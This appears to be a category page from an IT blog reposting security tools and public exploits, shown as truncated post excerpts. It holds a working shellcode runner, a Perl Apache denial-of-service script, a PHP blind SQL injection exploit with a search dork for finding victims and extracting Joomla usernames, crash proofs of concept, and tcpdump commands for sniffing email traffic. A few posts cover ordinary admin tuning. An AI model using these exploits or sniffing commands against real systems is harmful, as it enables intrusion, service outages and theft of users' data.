GO IT WORLD | IT TECH | IT NEWS » Security Tools

linux local privilege escalation on polkit-1 <= 0.101

jason — Thu, 06 Oct 2011 14:17:44 +0000

/* polkit-pwnage.c
*
*
* ==============================
* =      PolicyKit Pwnage      =
* =          by zx2c4          =
* =        Sept 2, 2011        =
* ==============================
*
*
* Howdy folks,
*
* This exploits CVE-2011-1485, a race condition in PolicyKit.
*
* davidz25 explains:
*
* –begin–
* Briefly, the problem is that the UID for the parent process of pkexec(1) is

… Read the rest

Apache httpd Remote Denial of Service memory exhaustion

jason — Thu, 25 Aug 2011 07:07:16 +0000

Publish Time:08-25-2011

Exploit method:

#Apache httpd Remote Denial of Service (memory exhaustion)
#By Kingcope
#Year 2011
#
# Will result in swapping memory to filesystem on the remote side
# plus killing of processes when running out of swap space.
# Remote System becomes unstable.
#

use IO::Socket;
use Parallel::ForkManager;

sub usage {
    print "Apache Remote Denial of Service (memory exhaustion)\n";
    print "by Kingcope\n";
    print "usage: perl killapache.pl <host> [numforks]\n";
    print "example: perl killapache.pl www.example.com 50\n";
}

sub killapache {

… Read the rest

sniffer tools example – 1

jason — Sun, 29 May 2011 01:55:37 +0000

Sniffer/Howto Sniff Contents of the emails

Sniff emails sent to 1.2.3.4
tcpdump -nnvvvS -s 0 -U -w sniff.smtp.pcap dst 1.2.3.4 and dst port 25
View the sniffed email data
wireshark -r sniff.smtp.pcap
- click on your "sending email address"
- click on "message text" to view the email contents
Sniff insecure POP email
tcpdump -nnvvvS -s 0 -U -w sniff.smtp.pcap dst 1.2.3.4 and dst port 110
Sniff insecure imap email
tcpdump -nnvvvS -s 0 -U -w sniff.smtp.pcap dst 1.2.3.4 and dst port 143

… Read the rest

sniffer tools for Centos–dsniff

jason — Thu, 07 Apr 2011 07:14:41 +0000

dsniff is a collection of tools for network auditing and penetration testing. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.). arpspoof, dnsspoof, and macof facilitate the interception of network traffic normally unavailable to an attacker (e.g, due to layer-2 switching). sshmitm and webmitm implement active monkey-in-the-middle attacks against redirected SSH and HTTPS sessions by exploiting weak bindings in ad-hoc PKI.

Home Page (http://monkey.org/~dugsong/dsniff/)

INSTALL Dsniff:

1. software list

libpcap-0.7.2.tar.gz

libnet-1.0.2a.tar.gz

libnids-1.18.tar.gz

dsniff-2.3.tar.gz

2. install gcc and openssl

yum –y install openssl gcc

… Read the rest

Windows Server 2003 Enterprise Edition SP1 ita calc.exe shellcode 36 bytes

jason — Tue, 16 Mar 2010 12:40:39 +0000

#include <stdio.h>
#include <string.h>

char liscker[] =
"\xeb\x16\x5b\x31\xc0\x50\x53\xbb\x0d\x25\x86\x7c\xff\xd3\x31\xc0"
"\x50\xbb\x12\xcb\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63\x61\x6c"
"\x63\x2e\x65\x78\x65\x00";

int main(int argc, char **argv)
{
    int (*shellcode)();
    shellcode = (int (*)()) liscker;
    (int)(*shellcode)();
}

Free website security scanner tools – wwwscan

jason — Thu, 11 Mar 2010 09:52:27 +0000

wwwscan is a very good free website security scanner tools,It can help you improve your website security level,hope it can help you.

<Usage>: wwwscan <HostName|Ip> [Options]
<Options>:
          -p port        : set http/https port
          -m thread      : set max thread
          -t timeout     : tcp timeout in seconds
          -r rootpath    : set root path to scan
          -ssl           : will use ssl
<Example>:
          wwwscan www.target.com -p 8080 -m 10 -t 16
          wwwscan www.target.com -r "/test/" -p 80
          wwwscan www.target.com –ssl

You can download it from here.

Iptables ip_conntrack table set-up and tunning for high load UDP traffic

jason — Tue, 02 Mar 2010 10:55:09 +0000

If you run a busy DNS server or any other service that uses a lot of UDP traffic, it’s possible that your default Iptable conntrack sessions (connection tracking entries in kernel memory) settings are too low and netfilter is unable to track all your sessions.

The error is usually something like this:

Sep 10 12:53:44 hostname01 kernel: ip_conntrack: table full, dropping packet.

You need to tune sysctl net.ipv4.ip_conntrack_max value, let’s say increase it twice or more times and see if you still get the error messages on the console or syslog.

Depending on your OS, the formula for calculating the… Read the rest

Joomla Component com_joomlaconnect_be Blind Injection Vulnerability

jason — Fri, 26 Feb 2010 09:44:47 +0000

Test Code


#!/usr/bin/php
  <?php 

ini_set("max_execution_time",0); 

print_r(' 

########################################################################### 

[»] Joomla com_joomlaconnect_be Remote Blind Injection Vulnerability 

########################################################################### 

[»] Script:   [Joomla] 

[»] Language: [ PHP ] 

[»] Founder:  [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ] 

[»] Greetz to:[ Spécial >>>>His0k4 >>>>   Tous les hackers Algérie 

[»] Dork: inurl:index.php?option=com_joomlaconnect_be 

########################################################################### 

########################################################################### 

# 

#  Joomla com_joomlaconnect_be (id) Blind SQL Injection Exploit 

#  [x] Usage: joomla.php "http://url/index.php?option=com_joomlaconnect_be&Itemid=53&task=showBizPage&id=3 

# 

# 

########################################################################### 

'); 

if ($argc > 1) { 

$url = $argv[1]; 

$r = strlen(file_get_contents($url."+and+1=1--")); 

echo "\nExploiting:\n"; 

$w = strlen(file_get_contents($url."+and+1=0--")); 

$t = abs((100-($w/$r*100))); 

echo "Username: "; 

for ($i=1; $i <= 30; $i++) { 

$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--")); 

   if

… Read the rest

Ethereal EIGRP Dissector TLV_IP_INT Long IP Remote DoS Exploit

jason — Mon, 07 Dec 2009 12:03:09 +0000

/*
* Ethereal network protocol analyzer
* EIGRP Dissector TLV_IP_INT Long IP Address Overflow
* vulnerability
* proof of concept code
* version 1.0 (Mar 26 2004)
*
* by R�mi Denis-Courmont < ethereal at simphalampin dot com >
*   www simphalempin com dev
*
* This vulnerability was found by:
*   Stefan Esser s.esser e-matters de
* whose original advisory may be fetched from:
*   security e-matters de advisories 032004.html
*… Read the rest

ZoIPer V2.22 Call-Info Remote Denial Of Service

jason — Sat, 28 Nov 2009 01:20:26 +0000

#!/usr/bin/python

# ZoIPer v2.22 Call-Info Remote Denial Of Service.
# Remote Crash P.O.C.
# Author: Tomer Bitton (Gr33n_G0bL1n)
# Tested on Windows XP SP2 , SP3 , Ubuntu 8.10
#
# Vendor Notified on: 21/09/2009
# Vendor Fix: Fixed in version 2.24 Library 5324
#
# Bad Chars: \x20 , \x09

import sys
import socket
import os

def main(argc , argv):

    if len(sys.argv) != 2:
        os.system("cls")
        sys.exit("Usage: " + sys.argv[0] + " <target_ip>\n")
    target_host = sys.argv[1]
    target_port… Read the rest